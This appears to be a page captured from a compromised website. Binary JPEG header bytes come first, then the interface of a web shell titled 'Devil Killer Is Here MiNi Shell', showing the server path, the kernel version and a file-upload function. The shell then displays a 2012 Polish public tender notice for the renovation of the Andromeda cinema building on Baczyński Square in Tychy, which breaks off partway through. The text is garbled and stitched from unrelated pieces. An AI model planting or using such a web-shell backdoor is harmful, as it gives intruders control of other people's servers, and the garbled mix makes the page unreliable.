JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120319/84828-N-2012.html

<p class="kh_header"><b>Tychy: REWITALIZACJA  PLACU  BACZYŃSKIEGO - PASAŻ KULTURALNY ANDROMEDA</b><br>
<b>Numer ogłoszenia: 84828 - 2012; data zamieszczenia: 19.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REWITALIZACJA  PLACU  BACZYŃSKIEGO - PASAŻ KULTURALNY ANDROMEDA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest wykonanie - zgodnie z projektem budowlano-wykonawczym 
      przebudowy i zmiany sposobu użytkowania byłego Kina Andromeda na cele obiektu 
      użyteczności publicznej ( funkcja wystawiennicza, mediateka, gastronomia, usługi ), 
      na parcelach nr: 4843/33,  4842/33,  2318/33, 5324,  4844/33 położonych przy 
      Pl. Baczyńskiego 1 w Tychach.
 
 2.  Zakres robót obejmuje między innymi:

 2.1 Roboty budowlane - architektura i konstrukcja:
      1) architektura:  piwnice, parter, elewacje:
      a) roboty rozbiórkowe i wyburzeniowe, 
      b) roboty żelbetowe, betonowe, roboty murarskie, tynkarskie,  wymurowanie 
          wieloprzewodowych kominów z cegieł, wykonanie izolacji pionowej ścian przyziemia, roboty 
          ślusarskie, montaż ścianek szklanych i aluminiowych, montaż stolarki okiennej i drzwiowej, 
          montaż rur spustowych, rynien, montaż balustrad schodowych, wykonanie świetlika 
          dachowego, roboty izolacyjne,  ułożenie posadzek , wykonanie gładzi gipsowych, 
          roboty malarskie, ułożenie okładzin ściennych i podłogowych, dostawa i montaż 
          wyposażenia sanitariatów (dozowniki na mydło, pojemniki na ręczniki papierowe, kosze 
          blatowe, lustra, itp.),   montaż sufitów podwieszanych, wykończenie schodów w hallu,
          schody zewnętrzne, montaż windy osobowej, wykonanie elewacji południowej - wejściowej 
          z laminatu wysokociśnieniowego gr. 10 mm, wykonanie elewacji północnej, południowej - 
          wewnętrznej, zachodniej i wschodniej  z bloczków gr. 9,5 cm, montaż fasad aluminiowych,
          roboty dekarskie z  rozebraniem płyt dachowych żelbetowych o gr. 15 cm,
     2)  konstrukcja:  zbrojenie
     a)  fundamenty, ławy, stopy fundamentowe, płyty stropowe na piwnicą i nad parterem - wykopy 
          nieumocnione wewnątrz budynku przy istniejących fundamentach, roboty izolacyjne 
          przeciwwilgociowe - poziome i pionowe, deskowanie, betonowanie ław ,stóp 
          fundamentowych zbrojonych, montaż elementów zbrojarskich w elementach budynku, 
          betonowanie słupów prostokątnych zbrojonych w deskowaniu z transportem betonu pompą
      b) strop nad piwnicą i nad parterem -  deskowanie, betonowanie płyt stropowych zbrojonych 
          w deskowaniu z transportem betonu pompą 
      c) szyb windy- wykonanie izolacji poziomej na sucho oraz izolacji przeciwwilgociowej pionowej,
          deskowanie, montaż dostarczonych prefabrykatów zbrojarskich w elementach budynku, 
          betonowanie ścian prostych w deskowaniu oraz betonowanie płyt stropowych zbrojonych 
          w deskowaniu z transportem betonu pompą, dostawa i montaż dźwigu osobowego
      d) konstrukcja schodów w hallu - wykucie bruzdy,  wykonanie izolacji pionowej, schody 
          żelbetowe belki - podestowe i kotwiące - ręczne układanie betonu, schody żelbetowe 
          proste na płycie gr.18 cm- ręczne układanie betonu, montaż zbrojenia.
      e) konstrukcja klatki schodowej - montaż podkładów betonowych na podłożu gruntowym, 
          roboty izolacyjne, płyty fundamentowe żelbetowe - z zastosowaniem pompy do betonu,
          montaż prefabrykatów zbrojarskich w elementach budynku, betonowanie ścian prostych 
          zbrojonych w deskowaniu z transportem betonu pompą, schody żelbetowe belki - podestowe 
          i kotwiące - ręczne układanie betonu, schody żelbetowe proste na płycie ,
      f) nadproża i podciągi piwnic - wykonanie przesklepień otworów w ścianch z cegieł
      g) słupy i belki stropu parteru, rygle parteru i piętra, rama, wspornik kratowy , schody stalowe, 
          belki ściany osłonowej, słupy ściany osłonowej  - dostawa i montaż konstrukcji stalowej
2.2  Wyposażenie 
       -  wyposażenie w meble:  recepcji, sali konferencyjnej , biura, madiateki 
       -  montaż tablicy pamiątkowej z informacją o wsparciu inwestycji ze środków unijnych

2.3  Roboty instalacyjne
       1) Instalacja wod. -kan   
       2) Instalacja grzewcza i wody lodowej   
       3) Wentylacja i klimatyzacja   
       4) Instalacja elektryczna
       5) Instalacja systemu sygnalizacji pożaru i sterowanie oddymianiem
       6) Przyłącze wodociągowe
       7) Oświetlenie terenu

2.4  Zagospodarowanie terenu
  
3.  Roboty przewidują ponadto wykonanie wszystkich niezbędnych prac, które towarzyszą  
     niniejszemu zamówieniu.

4.  Realizacja prac szczególnie uciążliwych nastąpi w godzinach od 09:00 do 16:00 

5.  Wykonawca zobowiązany jest do:

1)  Zorganizowania na własny koszt placu budowy w sposób uniemożliwiający wejście na teren 
     budowy osób nieupoważnionych, w szczególności:
a)	 należy wykonać ogrodzenie terenu budowy z elementów, których demontaż przez osoby 
 trzecie (nieupoważnione) będzie niemożliwy,
b)	 należy zapewnić ochronę (dozór) terenu budowy przez całą dobę w okresie realizacji
           umowy, w celu uniknięcia przebywania na tym terenie osób nieupoważnionych, wykluczenie  
           występowania aktów wandalizmu oraz wyeliminowania zagrożenia dla otoczenia,
c)	  zapewnienia zorganizowania placu budowy i prowadzenia robót w sposób, który nie będzie
     kolidował z imprezami organizowanymi na Placu Baczyńskiego
d)	wykonawca najpóźniej w dniu protokolarnego przekazania terenu budowy przedłoży
            Zamawiającemu do zatwierdzenia projekt zagospodarowania terenu sporządzony w 
            oparciu o zamieszczoną w projekcie informację dotyczącą bezpieczeństwa i ochrony 
            zdrowia. 
     2)  Projekt zagospodarowania terenu winien obejmować w szczególności: 
    a)  podanie rodzaju oraz sposobu ogrodzenia terenu i wyznaczenia stref niebezpiecznych, 
      b)  wykonania i oznaczenia dróg, wyjść i przejść dla pieszych (w tym wykonania zadaszeń i 
           tuneli umożliwiających bezpieczną komunikacje dla osób korzystających z klatek 
           schodowych oraz z lokali użytkowych 
      c)  urządzenia pomieszczeń higieniczno-sanitarnych i socjalnych; 
      d)  zapewnienia oświetlenia naturalnego i sztucznego w lokalach mieszkalnych i użytkowych  
           będących w bezpośrednim zasięgu wykonywanych robót budowlanych; 
      e)  zapewnienia właściwej wentylacji i przewietrzania (w tym podania informacji o sposobie 
           nadmiernego zapylenia w czasie prowadzenia robót budowlanych) 
      f)   urządzenia składowisk materiałów i wyrobów.
      g)  podania sposobu utrzymywania dróg publicznych i wewnętrznych w należytym stanie 
           czystości (umowa z firmą sprzątającą lub wykaz urządzeń służących do oczyszczania 
           nawierzchni dróg). 
3)  Uzyskania pozwolenia od Miejskiego Zarządu Ulic i Mostów ( MZUiM) w Tychach na  zajęcie 
      pasa drogowego w obszarze realizowanej inwestycji przy Pl. Baczyńskiego 1 w Tychach

4)  Opracowania projektu tymczasowej zmiany organizacji ruchu dla potrzeb budowy wraz 
      z uzgodnieniem dokumentacji z Wydziałem Komunikacji Urzędu Miasta Tychy,  Komendą 
        Policji w Tychach oraz Miejskim Zarządem Ulic i Mostów
5)   Opracowania projektu docelowej zmiany organizacji ruchu wynikającej ze zmiany 
       sposobu zagospodarowania terenu po zakończeniu realizacji inwestycji  wraz 
       z uzgodnieniem dokumentacji z Wydziałem Komunikacji Urzędu Miasta Tychy,  Komendą 
       Policji w Tychach oraz Miejskim Zarządem Ulic i Mostów.
6.  Szczegółowy zakres robót określają przedmiary robót w podziale na branże:
     1) Roboty budowlane - architektura i konstrukcja
     2) Wyposażenie 
     3) Instalacja wod. -kan   
     4) Instalacja grzewcza i wody lodowej   
     5) Wentylacja i klimatyzacja   
     6) Instalacja elektryczna
     7) Instalacja systemu sygnalizacji pożaru i sterowanie oddymianiem
     8) Przyłącze wodociągowe
     9) Oświetlenie terenu
   10) Zagospodarowanie terenu

7.  Przedmiary robót oraz  projekty wykonawcze stanowią integralną część SIWZ. 
    
8.  Zamawiający dopuszcza zastosowanie materiałów innych (tzw. równoważnych) o parametrach         
     i właściwościach nie gorszych niż wskazane w dokumentacji projektowej i przedmiarach robót 
     stanowiących integralną część SIWZ.
     
9. Na zakres robót będących przedmiotem niniejszego zamówienia Wykonawca przedstawi     
    Zamawiającemu harmonogram robót zawierający zakres rzeczowo - finansowy realizacji   
    zadania - wg wzoru druku stanowiącego załącznik nr 7 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust.1. pkt. 6) ustawy - PZP, do kwoty stanowiącej nie więcej niż 50 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.27.00-8, 45.11.13.00-1, 45.26.23.10-7, 45.26.23.00-4, 45.26.25.00-6, 45.41.00.00-4, 45.43.10.00-7, 45.44.21.00-8, 45.42.11.41-4, 45.32.00.00-6, 45.26.13.20-3, 45.26.12.10-9, 45.44.30.00-4, 45.42.11.30-4, 45.30.00.00-2, 45.33.00.00-9, 45.33.12.00-8, 45.31.31.00-5, 45.45.00.00-6, 45.11.12.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 270 000,00  zł  (słownie: dwieście siedemdziesiąt tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że  wykonawca spełnia warunek udziału dotyczący posiadania wiedzy i doświadczenia (art. 22 ust. 1 pkt 2 ustawy - PZP),  Zamawiający wymaga złożenia następujących dokumentów: 
wykazu robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania w którym należy wykazać: 
         -   co najmniej dwie roboty budowlane ( zrealizowane w ramach dwóch odrębnych umów )                
         dotyczące budynku użyteczności publicznej , o wartości min. 5 500 000,00 zł (brutto)  - każda  z robót

     lub

         -   co najmniej jedną robotę budowlaną dotyczącą budynku użyteczności publicznej, 
         o wartości min.  11 000 000,00 zł  (brutto)
         
Do wykazu należy dołączyć dokumenty potwierdzające , że roboty wskazane w wykazie zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
 
           (W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać  
           łącznie  lub co najmniej jeden z wykonawców). 
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że wykonawca spełnia warunek udziału dotyczący dysponowania 
           osobami zdolnymi do wykonania zamówienia (art. 22 ust. 1 pkt 3 ustawy - PZP)  
           Zamawiający wymaga złożenia następujących dokumentów:  

      1)  wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, a w szczególności 
            odpowiedzialnych za kierowanie robotami budowlanymi , wraz z informacjami na temat 
           ich kwalifikacji zawodowych , doświadczenia i wykształcenia niezbędnych do wykonania  
           zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją
           o podstawie dysponowania tymi osobami.
            Wymagane jest dysponowanie osobą /osobami zdolnymi do wykonania zamówienia,   
           a w szczególności:

  a)  co najmniej jedną osobą do kierowania robotami budowlanymi - bez ograniczeń
              z uprawnieniami budowlanymi w  specjalności konstrukcyjno - budowlanej 

           b)  co najmniej jedną osobą do kierowania robotami instalacyjnymi z uprawnieniami  
                 budowlanymi w specjalności instalacyjno- inżynieryjnej w zakresie instalacji 
                 sanitarnych

        c)  co najmniej jedną osobą do kierowania robotami instalacyjnymi z uprawnieniami 
             budowlanymi  w specjalności instalacyjno-inżynieryjnej w zakresie instalacji 
             elektrycznych 

        d)  co najmniej jedną osobą posiadającą kwalifikacje uprawniające do zajmowania się 
             eksploatacją urządzeń , instalacji i sieci elektroenergetycznych do 1KV na stanowisku 
             dozoru

        e)  co najmniej trzema osobami posiadającymi kwalifikacje do wykonywania pracy 
              na stanowisku eksploatacji w zakresie obsługi, konserwacji i remontów urządzeń
              i instalacji elektrycznych o napięciu do 1 kV 

         f)  co najmniej jedną osobą posiadającą kwalifikacje uprawniające do wykonywania 
              pomiarów ochron przeciwporażeniowych i instalacji odgromowych

                Wykaz osób należy sporządzić wg wzoru druku stanowiącego załącznik Nr 4 do SIWZ.

             (W przypadku podmiotów występujących wspólnie w/w warunki udziału wykonawcy mogą 
              spełniać łącznie lub co najmniej jeden z wykonawców).     

        2)  oświadczenie , że osoby, która będą uczestniczyć w wykonaniu zamówienia posiadają 
                wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia , że  wykonawca spełnia warunek udziału dotyczący posiadania wymaganej sytuacji ekonomicznej i finansowej  (art. 22 ust. 1 pkt. 4 ustawy - PZP), Zamawiający wymaga, złożenia następujących dokumentów: 

1)  informacji banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową  wykonawcy na kwotę nie mniejszą
niż 9 000 000,00 zł  - wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
2)  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - o wartości ubezpieczenia nie mniejszej niż  2 000 000,00 zł ,
Do oferty należy dołączyć potwierdzenie opłacenia polisy  l u b  fakt  jej opłacenia 
musi wynikać z treści dokumentu.
Jeżeli fakt opłacenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, nie wynika wprost z załączonego do oferty dokumentu wykonawca jest zobowiązany dołączyć inny dokument potwierdzający opłacenie składki (np. kopia przelewu składki, potwierdzenie ubezpieczyciela).   

      (W przypadku podmiotów występujących wspólnie warunki udziału  określone w pkt. 1) i 2) wykonawcy mogą spełniać  łącznie lub co najmniej jeden z wykonawców). 

Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów 
dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku (art. 26 ust. 2 c ustawy PZP).
Ocena spełnienia tego warunku będzie dokonywana zgodnie z formułą: spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony i podpisany formularz ofertowy -  sporządzony według wzoru stanowiącego załącznik nr 1 do SIWZ
